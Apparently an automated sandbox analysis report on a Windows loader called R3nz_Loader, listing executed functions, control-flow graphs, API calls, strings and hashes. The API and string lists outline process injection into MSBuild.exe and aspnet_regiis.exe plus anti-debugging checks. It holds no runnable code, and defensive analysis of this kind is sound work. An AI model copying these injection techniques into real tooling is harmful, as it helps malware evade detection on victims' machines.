__startOneArgErrorHandling 11517->11519 11520 6cef0a90 _ValidateLocalCookies 5 API calls 11519->11520 11521 6cefa0dc 11520->11521 11521->11502 11523 6cefa625 11522->11523 11524 6cefa699 __startOneArgErrorHandling 11523->11524 11525 6cefa644 __startOneArgErrorHandling 11523->11525 11526 6cefa5e7 __startOneArgErrorHandling 14 API calls 11524->11526 11528 6cefa692 11525->11528 11529 6cefa5e7 __startOneArgErrorHandling 14 API calls 11525->11529 11527 6cefa6ae 11526->11527 11527->11519 11528->11519 11529->11528 12240 6cef59d1 12241 6cef59dd ___scrt_is_nonwritable_in_current_image 12240->12241 12252 6cef3bda EnterCriticalSection 12241->12252 12243 6cef59e4 12244 6cef7511 26 API calls 12243->12244 12245 6cef59f3 12244->12245 12246 6cef5a02 12245->12246 12253 6cef5867 GetStartupInfoW 12245->12253 12259 6cef5a28 12246->12259 12251 6cef591d 2 API calls 12251->12246 12252->12243 12254 6cef5884 12253->12254 12256 6cef5918 12253->12256 12255 6cef7511 26 API calls 12254->12255 12254->12256 12258 6cef58ac 12255->12258 12256->12251 12257 6cef58dc GetFileType 12257->12258 12258->12256 12258->12257 12262 6cef3c22 LeaveCriticalSection 12259->12262 12261 6cef5a13 12262->12261 12417 6cef6950 12418 6cef698a 12417->12418 12419 6cef3ed3 _free 14 API calls 12418->12419 12424 6cef699e 12418->12424 12420 6cef6993 12419->12420 12421 6cef3e16 __fassign 25 API calls 12420->12421 12421->12424 12422 6cef0a90 _ValidateLocalCookies 5 API calls 12423 6cef69ab 12422->12423 12424->12422

                                                                              Executed Functions

                                                                              Function 6CEE8640 Relevance: 100.9, APIs: 28, Strings: 25, Instructions: 8115nativethreadmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Virtual$Memory$Write$Thread$CloseHandle$AllocateCreateRead$ContextProcessResumeWindow$AllocConsoleShow
                                                                              • String ID: ma_$,/s$<Mj$<Mj$?b\x$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$MZx$OQ!Y$OQ!Y$TD4+$b'aX$c/$kernel32.dll$ntdll.dll$s"E&$w.qo$w.qo$w]~$w]~$~zm$J/$rg)
                                                                              • API String ID: 349478264-3264118132
                                                                              • Opcode ID: 3a0c55d25b95f289ec98d2fc4157df03fe0872857c79a8c19a8489331040f14e
                                                                              • Instruction ID: 2eb91bb33cbbe170ab75ae9b0c72f79162c9efe6afb22ec1e439b026c4b9aad3
                                                                              • Opcode Fuzzy Hash: 3a0c55d25b95f289ec98d2fc4157df03fe0872857c79a8c19a8489331040f14e
                                                                              • Instruction Fuzzy Hash: 17D30636A502118FDB18CE3CC9D43CD77F2AB4B3A4F209199D419DBBA5D6358E8A8F11
                                                                              Function 6CEE1740 Relevance: 46.6, APIs: 22, Strings: 3, Instructions: 2893filememoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$HandleModule$CloseCreateProtectViewVirtual$CurrentMappingNameProcess$Information
                                                                              • String ID: @$d,>$pYof
                                                                              • API String ID: 2573367501-2859445575
                                                                              • Opcode ID: 046d4690d8713550a57dc717142d1362ebb53a9273e0cc02bca20a0a67fd116f
                                                                              • Instruction ID: 00c8a58b783375468f30d620dff84176b776be62e826b966f5955e2b073845a5
                                                                              • Opcode Fuzzy Hash: 046d4690d8713550a57dc717142d1362ebb53a9273e0cc02bca20a0a67fd116f
                                                                              • Instruction Fuzzy Hash: DB330032A082158FDB08DF7CC9947CD77F2AB5A394F209559D419DBB95C3368A8ACF02
                                                                              Function 6CEE6B80 Relevance: 17.1, APIs: 2, Strings: 7, Instructions: 1306COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1436 6cee6b80-6cee6bca 1437 6cee6bd1-6cee6bdc 1436->1437 1438 6cee6be2-6cee6bef 1437->1438 1439 6cee7730-6cee773f 1437->1439 1442 6cee7d4e-6cee7d55 1438->1442 1443 6cee6bf5-6cee6c02 1438->1443 1441 6cee7d88 1439->1441 1441->1437 1442->1441 1445 6cee7d1e-6cee7d25 1443->1445 1446 6cee6c08-6cee6c15 1443->1446 1445->1441 1448 6cee794a-6cee7993 1446->1448 1449 6cee6c1b-6cee6c28 1446->1449 1448->1441 1451 6cee6c2e-6cee6c3b 1449->1451 1452 6cee7d03-6cee7d0d 1449->1452 1454 6cee7805-6cee780c 1451->1454 1455 6cee6c41-6cee6c4e 1451->1455 1452->1441 1454->1441 1457 6cee7d2a-6cee7d31 1455->1457 1458 6cee6c54-6cee6c61 1455->1458 1457->1441 1460 6cee6c67-6cee6c74 1458->1460 1461 6cee7792-6cee7800 1458->1461 1463 6cee7d5a-6cee7d61 1460->1463 1464 6cee6c7a-6cee6c87 1460->1464 1461->1441 1463->1441 1466 6cee7c0e-6cee7c7c 1464->1466 1467 6cee6c8d-6cee6c9a 1464->1467 1466->1441 1469 6cee7b6e-6cee7bdc 1467->1469 1470 6cee6ca0-6cee6cad 1467->1470 1469->1441 1472 6cee73b5-6cee73fc NtQueryInformationProcess 1470->1472 1473 6cee6cb3-6cee6cc0 1470->1473 1472->1441 1475 6cee75de-6cee7627 1473->1475 1476 6cee6cc6-6cee6cd3 1473->1476 1475->1441 1478 6cee6cd9-6cee6ce6 1476->1478 1479 6cee7d42-6cee7d49 1476->1479 1481 6cee7d7e-6cee7d81 1478->1481 1482 6cee6cec-6cee6cf9 1478->1482 1479->1441 1481->1441 1484 6cee6cff-6cee6d0c 1482->1484 1485 6cee7811-6cee7821 1482->1485 1487 6cee7416-6cee7457 1484->1487 1488 6cee6d12-6cee6d1f 1484->1488 1485->1441 1487->1441 1490 6cee7998-6cee799f 1488->1490 1491 6cee6d25-6cee6d32 1488->1491 1490->1441 1493 6cee7b0d-6cee7b27 call 6cef0a90 1491->1493 1494 6cee6d38-6cee6d45 1491->1494 1498 6cee6d4b-6cee6d58 1494->1498 1499 6cee7638-6cee76a6 1494->1499 1501 6cee6d5e-6cee6d6b 1498->1501 1502 6cee7891-6cee78ff 1498->1502 1499->1441 1504 6cee7abf-6cee7b08 1501->1504 1505 6cee6d71-6cee6d7e 1501->1505 1502->1441 1504->1441 1507 6cee7744-6cee778d 1505->1507 1508 6cee6d84-6cee6d91 1505->1508 1507->1441 1510 6cee6d97-6cee6da4 1508->1510 1511 6cee7363-6cee73a4 1508->1511 1513 6cee6daa-6cee6db7 1510->1513 1514 6cee7060-6cee70d4 1510->1514 1511->1441 1516 6cee6dbd-6cee6dca 1513->1516 1517 6cee71b0-6cee7229 GetModuleHandleW call 6cee43e0 call 6cef16c0 1513->1517 1514->1441 1521 6cee7b28-6cee7b69 1516->1521 1522 6cee6dd0-6cee6ddd 1516->1522 1517->1441 1521->1441 1526 6cee7826-6cee788c 1522->1526 1527 6cee6de3-6cee6df0 1522->1527 1526->1441 1529 6cee6df6-6cee6e03 1527->1529 1530 6cee7be1-6cee7be8 1527->1530 1532 6cee762c-6cee7633 1529->1532 1533 6cee6e09-6cee6e16 1529->1533 1530->1441 1532->1441 1535 6cee6e1c-6cee6e29 1533->1535 1536 6cee7590-6cee75d9 1533->1536 1538 6cee6e2f-6cee6e3c 1535->1538 1539 6cee7bed-6cee7bf4 1535->1539 1536->1441 1541 6cee73a9-6cee73b0 1538->1541 1542 6cee6e42-6cee6e4f 1538->1542 1539->1441 1541->1441 1544 6cee70d9-6cee70e0 1542->1544 1545 6cee6e55-6cee6e62 1542->1545 1544->1441 1547 6cee6e68-6cee6e75 1545->1547 1548 6cee70e5-6cee712e 1545->1548 1550 6cee6e7b-6cee6e88 1547->1550 1551 6cee7d12-6cee7d19 1547->1551 1548->1441 1553 6cee79fe-6cee7a6c 1550->1553 1554 6cee6e8e-6cee6e9b 1550->1554 1551->1441 1553->1441 1556 6cee79a4-6cee79b3 1554->1556 1557 6cee6ea1-6cee6eae 1554->1557 1556->1441 1559 6cee6eb4-6cee6ec1 1557->1559 1560 6cee7315-6cee735e 1557->1560 1562 6cee6ec7-6cee6ed4 1559->1562 1563 6cee7401-6cee7411 1559->1563 1560->1441 1565 6cee74cf-6cee7535 1562->1565 1566 6cee6eda-6cee6ee7 1562->1566 1563->1441 1565->1441 1568 6cee6eed-6cee6efa 1566->1568 1569 6cee7904-6cee7945 1566->1569 1571 6cee753a-6cee758b 1568->1571 1572 6cee6f00-6cee6f0d 1568->1572 1569->1441 1571->1441 1574 6cee7bf9-6cee7c09 1572->1574 1575 6cee6f13-6cee6f20 1572->1575 1574->1441 1577 6cee6f26-6cee6f33 1575->1577 1578 6cee7133-6cee719f 1575->1578 1580 6cee6f39-6cee6f46 1577->1580 1581 6cee7d72-6cee7d79 1577->1581 1578->1441 1583 6cee6f4c-6cee6f59 1580->1583 1584 6cee7c81-6cee7cf2 1580->1584 1581->1441 1586 6cee6f5f-6cee6f6c 1583->1586 1587 6cee76ab-6cee771f 1583->1587 1584->1441 1589 6cee703a-6cee705b 1586->1589 1590 6cee6f72-6cee6f7f 1586->1590 1587->1441 1589->1441 1592 6cee7299-6cee7310 1590->1592 1593 6cee6f85-6cee6f92 1590->1593 1592->1441 1595 6cee6f98-6cee6fa5 1593->1595 1596 6cee7cf7-6cee7cfe 1593->1596 1598 6cee6fab-6cee6fb8 1595->1598 1599 6cee7d66-6cee7d6d 1595->1599 1596->1441 1601 6cee6fbe-6cee6fcb 1598->1601 1602 6cee7d36-6cee7d3d 1598->1602 1599->1441 1604 6cee7724-6cee772b 1601->1604 1605 6cee6fd1-6cee6fde 1601->1605 1602->1441 1604->1441 1607 6cee745c-6cee74ca 1605->1607 1608 6cee6fe4-6cee6ff1 1605->1608 1607->1441 1610 6cee6ff7-6cee7004 1608->1610 1611 6cee7a71-6cee7aba 1608->1611 1613 6cee700a-6cee7017 1610->1613 1614 6cee79b8-6cee79f9 1610->1614 1611->1441 1616 6cee722e-6cee7294 1613->1616 1617 6cee701d-6cee702a 1613->1617 1614->1441 1616->1441 1619 6cee71a4-6cee71ab 1617->1619 1620 6cee7030-6cee7035 1617->1620 1619->1441 1620->1441
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CEE71D8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID: (Tls$9.=H$9.=H$>Be8$>Be8$NtQueryInformationProcess$ntdll.dll
                                                                              • API String ID: 4139908857-3027456121
                                                                              • Opcode ID: b1f5dd322a2e3cab1dc76725cccbcae94872fea7caac743b6c1fb4c790531157
                                                                              • Instruction ID: f4e8699c3d5859ab3a79636d33726b546fcf3f1f1a318c43d905255510a3a1fb
                                                                              • Opcode Fuzzy Hash: b1f5dd322a2e3cab1dc76725cccbcae94872fea7caac743b6c1fb4c790531157
                                                                              • Instruction Fuzzy Hash: 36922532A642058FDF08DE7CD5D53DD37F29B8B3A8F309515D421DBBA6C62A990B8B01
                                                                              Function 6CEF0BF8 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1622 6cef0bf8-6cef0c0b call 6cef1460 1625 6cef0c0d-6cef0c0f 1622->1625 1626 6cef0c11-6cef0c33 call 6cef1040 1622->1626 1627 6cef0c7a-6cef0c89 1625->1627 1630 6cef0c35-6cef0c78 call 6cef110b call 6cef0fc7 call 6cef1429 call 6cef0c8d call 6cef12ac call 6cef0c9a 1626->1630 1631 6cef0ca0-6cef0cb9 call 6cef12da call 6cef1460 1626->1631 1630->1627 1642 6cef0cbb-6cef0cc1 1631->1642 1643 6cef0cca-6cef0cd1 1631->1643 1642->1643 1645 6cef0cc3-6cef0cc5 1642->1645 1646 6cef0cdd-6cef0cf1 dllmain_raw 1643->1646 1647 6cef0cd3-6cef0cd6 1643->1647 1649 6cef0da3-6cef0db2 1645->1649 1651 6cef0d9a-6cef0da1 1646->1651 1652 6cef0cf7-6cef0d08 dllmain_crt_dispatch 1646->1652 1647->1646 1650 6cef0cd8-6cef0cdb 1647->1650 1654 6cef0d0e-6cef0d20 call 6cef0250 1650->1654 1651->1649 1652->1651 1652->1654 1661 6cef0d49-6cef0d4b 1654->1661 1662 6cef0d22-6cef0d24 1654->1662 1663 6cef0d4d-6cef0d50 1661->1663 1664 6cef0d52-6cef0d63 dllmain_crt_dispatch 1661->1664 1662->1661 1665 6cef0d26-6cef0d44 call 6cef0250 call 6cef0bf8 dllmain_raw 1662->1665 1663->1651 1663->1664 1664->1651 1667 6cef0d65-6cef0d97 dllmain_raw 1664->1667 1665->1661 1667->1651
                                                                              APIs
                                                                              • __RTC_Initialize.LIBCMT ref: 6CEF0C3F
                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6CEF0C59
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                              • String ID:
                                                                              • API String ID: 2442719207-0
                                                                              • Opcode ID: a29563e2798693384503791fe5548f5c94308cfae1bf34208c57f4795615b96c
                                                                              • Instruction ID: aa78a6a6bca733a35864f1a6efe4238b6251a6774f81f2a1d26c41f8683298c8
                                                                              • Opcode Fuzzy Hash: a29563e2798693384503791fe5548f5c94308cfae1bf34208c57f4795615b96c
                                                                              • Instruction Fuzzy Hash: 2641E572E05698AFDB109F99CC40BEE7A75EB81B9CF304119E834A7B40D7319D079BA0
                                                                              Function 6CEF0CA8 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1672 6cef0ca8-6cef0cb9 call 6cef1460 1675 6cef0cbb-6cef0cc1 1672->1675 1676 6cef0cca-6cef0cd1 1672->1676 1675->1676 1677 6cef0cc3-6cef0cc5 1675->1677 1678 6cef0cdd-6cef0cf1 dllmain_raw 1676->1678 1679 6cef0cd3-6cef0cd6 1676->1679 1680 6cef0da3-6cef0db2 1677->1680 1682 6cef0d9a-6cef0da1 1678->1682 1683 6cef0cf7-6cef0d08 dllmain_crt_dispatch 1678->1683 1679->1678 1681 6cef0cd8-6cef0cdb 1679->1681 1684 6cef0d0e-6cef0d20 call 6cef0250 1681->1684 1682->1680 1683->1682 1683->1684 1687 6cef0d49-6cef0d4b 1684->1687 1688 6cef0d22-6cef0d24 1684->1688 1689 6cef0d4d-6cef0d50 1687->1689 1690 6cef0d52-6cef0d63 dllmain_crt_dispatch 1687->1690 1688->1687 1691 6cef0d26-6cef0d44 call 6cef0250 call 6cef0bf8 dllmain_raw 1688->1691 1689->1682 1689->1690 1690->1682 1693 6cef0d65-6cef0d97 dllmain_raw 1690->1693 1691->1687 1693->1682
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                              • String ID:
                                                                              • API String ID: 3136044242-0
                                                                              • Opcode ID: 7be2483f6991ee4be8b89b5708fb61084043a66057ea4e240dfc396afecd568b
                                                                              • Instruction ID: bba6a3742c3442796768765a71d04e9fbca1bc946cc9ad622a363635769ce354
                                                                              • Opcode Fuzzy Hash: 7be2483f6991ee4be8b89b5708fb61084043a66057ea4e240dfc396afecd568b
                                                                              • Instruction Fuzzy Hash: 05219472D01699ABDB214F55CC40AAE7A79EB81B9CF214119F83867B10D3319D478BE0
                                                                              Function 6CEF0AF1 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1698 6cef0af1-6cef0b07 call 6cef1460 call 6cef113b 1703 6cef0bde 1698->1703 1704 6cef0b0d-6cef0b25 call 6cef1040 1698->1704 1705 6cef0be0-6cef0bef 1703->1705 1708 6cef0b2b-6cef0b3c call 6cef109d 1704->1708 1709 6cef0bf0-6cef0bf7 call 6cef12da 1704->1709 1714 6cef0b3e-6cef0b57 call 6cef13fd call 6cef0fbb call 6cef0fdf call 6cef2721 1708->1714 1715 6cef0b8b-6cef0b99 call 6cef0bd4 1708->1715 1732 6cef0b5c-6cef0b60 1714->1732 1715->1703 1720 6cef0b9b-6cef0ba5 call 6cef12d4 1715->1720 1726 6cef0ba7-6cef0bb0 call 6cef11fb 1720->1726 1727 6cef0bc6-6cef0bcf 1720->1727 1726->1727 1733 6cef0bb2-6cef0bc4 1726->1733 1727->1705 1732->1715 1734 6cef0b62-6cef0b69 call 6cef1072 1732->1734 1733->1727 1734->1715 1738 6cef0b6b-6cef0b88 call 6cef26dc 1734->1738 1738->1715
                                                                              APIs
                                                                              • __RTC_Initialize.LIBCMT ref: 6CEF0B3E
                                                                                • Part of subcall function 6CEF0FBB: InitializeSListHead.KERNEL32(6CF4C388,6CEF0B48,6CF000D8,00000010,6CEF0AD9,?,?,?,6CEF0D01,?,00000001,?,?,00000001,?,6CF00120), ref: 6CEF0FC0
                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CEF0BA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                              • String ID:
                                                                              • API String ID: 3231365870-0
                                                                              • Opcode ID: c450a8570a04be3909b7508ec9ea51f473e0d67841a50bd05f746a71009821f3
                                                                              • Instruction ID: d8a8357a51540d37630c453d108c5cb68883d7fc2c48b514006a49af9fc91268
                                                                              • Opcode Fuzzy Hash: c450a8570a04be3909b7508ec9ea51f473e0d67841a50bd05f746a71009821f3
                                                                              • Instruction Fuzzy Hash: 4D21C072A4A2C99EDB00AFF48814BDD77B1AB1226CF30441DD4B167FC2CB62454FD665
                                                                              Function 6CEF591D Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1741 6cef591d-6cef5922 1742 6cef5924-6cef593c 1741->1742 1743 6cef593e-6cef5942 1742->1743 1744 6cef594a-6cef5953 1742->1744 1743->1744 1745 6cef5944-6cef5948 1743->1745 1746 6cef5965 1744->1746 1747 6cef5955-6cef5958 1744->1747 1748 6cef59c3-6cef59c7 1745->1748 1751 6cef5967-6cef5974 GetStdHandle 1746->1751 1749 6cef595a-6cef595f 1747->1749 1750 6cef5961-6cef5963 1747->1750 1748->1742 1752 6cef59cd-6cef59d0 1748->1752 1749->1751 1750->1751 1753 6cef5976-6cef5978 1751->1753 1754 6cef5983 1751->1754 1753->1754 1755 6cef597a-6cef5981 GetFileType 1753->1755 1756 6cef5985-6cef5987 1754->1756 1755->1756 1757 6cef5989-6cef5992 1756->1757 1758 6cef59a5-6cef59b7 1756->1758 1759 6cef599a-6cef599d 1757->1759 1760 6cef5994-6cef5998 1757->1760 1758->1748 1761 6cef59b9-6cef59bc 1758->1761 1759->1748 1762 6cef599f-6cef59a3 1759->1762 1760->1748 1761->1748 1762->1748
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 6CEF5969
                                                                              • GetFileType.KERNELBASE(00000000), ref: 6CEF597B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileHandleType
                                                                              • String ID:
                                                                              • API String ID: 3000768030-0
                                                                              • Opcode ID: 1ad674da6d66f74448fb8102230df655ff604111948907cbea83118c3c4129a3
                                                                              • Instruction ID: e04ed1dc5b94efe0a8a0ad4514accad4fd76b092a8cde4977b51edccb59b9ff7
                                                                              • Opcode Fuzzy Hash: 1ad674da6d66f74448fb8102230df655ff604111948907cbea83118c3c4129a3
                                                                              • Instruction Fuzzy Hash: 4011DA7260A7524ADB284E3E8C88B16BAB597B723CB38A71ED0B5C6EE1C730D547C541
                                                                              Function 6CEF6180 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1763 6cef6180-6cef618b 1764 6cef618d-6cef6192 1763->1764 1765 6cef6194-6cef6196 1763->1765 1766 6cef619a 1764->1766 1767 6cef619f-6cef61a2 call 6cef3ee6 1765->1767 1768 6cef6198 1765->1768 1766->1767 1770 6cef61a7-6cef61bd call 6cef3f43 1767->1770 1768->1766 1773 6cef61bf-6cef61e3 call 6cef3ee6 call 6cef3f43 1770->1773 1774 6cef61ea-6cef61ed 1770->1774 1773->1774 1784 6cef61e5-6cef61e9 1773->1784 1776 6cef61f2-6cef6225 call 6cef5712 1774->1776 1782 6cef6227-6cef622a 1776->1782 1783 6cef6230 1776->1783 1782->1783 1785 6cef622c-6cef622e 1782->1785 1786 6cef6237-6cef6241 1783->1786 1785->1783 1785->1786 1786->1776 1787 6cef6243-6cef6247 1786->1787
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: d0c0ffc447f17c7d8506c4786e21688bf88165fb7ef0968a47c924eaaa7411b2
                                                                              • Instruction ID: bbafac8a8917bb88136c2d6b1b856e700c6537e8104913da9ef8b5bb3296f3e7
                                                                              • Opcode Fuzzy Hash: d0c0ffc447f17c7d8506c4786e21688bf88165fb7ef0968a47c924eaaa7411b2
                                                                              • Instruction Fuzzy Hash: 7311D372F246005BDB64EA2D9C11B8637B8675277CF24571AE635CBFC2E370D48B4640
                                                                              Function 6CEF3EE6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1788 6cef3ee6-6cef3ef1 1789 6cef3eff-6cef3f05 1788->1789 1790 6cef3ef3-6cef3efd 1788->1790 1792 6cef3f1e-6cef3f2f RtlAllocateHeap 1789->1792 1793 6cef3f07-6cef3f08 1789->1793 1790->1789 1791 6cef3f33-6cef3f3e call 6cef3ed3 1790->1791 1799 6cef3f40-6cef3f42 1791->1799 1794 6cef3f0a-6cef3f11 call 6cef6945 1792->1794 1795 6cef3f31 1792->1795 1793->1792 1794->1791 1801 6cef3f13-6cef3f1c call 6cef5b05 1794->1801 1795->1799 1801->1791 1801->1792
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF3AE9,00000001,00000364,00000013,000000FF,?,00000001,6CEF3ED8,6CEF3F69,?,?,6CEF317C), ref: 6CEF3F27
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 8af45551fea44ff5d072a5296bad6856a26280021061e2863e475b9c468f28a4
